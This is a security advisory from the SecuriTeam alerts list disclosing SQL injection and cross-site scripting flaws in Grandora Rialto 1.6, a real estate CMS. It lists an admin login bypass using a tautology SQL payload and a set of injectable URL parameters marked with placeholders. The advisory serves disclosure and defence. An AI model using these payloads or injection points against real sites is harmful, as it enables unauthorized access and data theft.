[NT] Grandora Railto Multiple SQL Injection and Cross Site Scripting Vulnerabilities

- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.

- - - - - - - - -

Grandora Railto Multiple SQL Injection and Cross Site Scripting
Vulnerabilities

SUMMARY

<http://www.grandora.com/> Grandora Rialto is "a real estate content
management system". Grandora Rialto is vulnerable to multiple SQL
injection vulnerabilities allowing remote attackers to cause the product
to insert arbitrary SQL statements into existing ones as well as inject
arbitrary HTML and/or JavaScript into existing pages.

DETAILS

Vulnerable Systems:
* Grandora Rialto version 1.6

Admin login bypass:
/admin/default.asp
username: ' or '1' = '1
password: ' or '1' = '1

SQL Injections:
/listfull.asp?ID='[sql]
/listmain.asp?cat='[sql]
/printmain.asp?ID='[sql]
/searchkey.asp?Keyword='[sql]
/searchmain.asp?I1=1&area='[sql]
/searchoption.asp?I12=1&cat='[sql]
/searchmain.asp?I1=1&area=all&cat='[sql]
/searchoption.asp?I12=1&cat=all&area='[sql]
/searchkey.asp?Keyword=1&I1=1&searchin='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1='[sql]
/searchoption.asp?I12=1&cat=all&area=all&cost1=0&cost2=10000&acreage1=0&acreage2=.5&squarefeet1='[sql]

Cross Site Scripting:
/listmain.asp?cat=[xss]
/searchkey.asp?Keyword=[xss]
/searchmain.asp?I1=1&area=all&cat=[xss]
/forminfo.asp?refno=[xss]

ADDITIONAL INFORMATION

The information has been provided by <mailto:saps.audit@xxxxxxxxx>
saps.audit.

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [UNIX] ChurchInfo Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... vulnerabilities. ... UserDelete.php - First page gives path disclosure, ... SQL injection and path disclosure: ...
    (Securiteam)
  • [UNIX] Gregarius XSS and SQL Injection Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Gregarius XSS and SQL Injection Vulnerabilities ... The following URL can used to trigger a cross site scripting vulnerability ...
    (Securiteam)
  • [UNIX] Cacti Multiple Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities exist in Cacti software (XSS, ... This causes an SQL Injection attack possible. ... then we can bypass the validation routine. ...
    (Securiteam)
  • [UNIX] PHPFreeNews SQL Injection and XSS
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... PHPFreeNews has been found to be vulnerable to numerous SQL Injection and ... Cross Site Scripting vulnerabilities. ...
    (Securiteam)
  • [UNIX] PHP-Nuke Multiple Vulnerabilities (Reviews/Encyclopedia/FAQ Modules)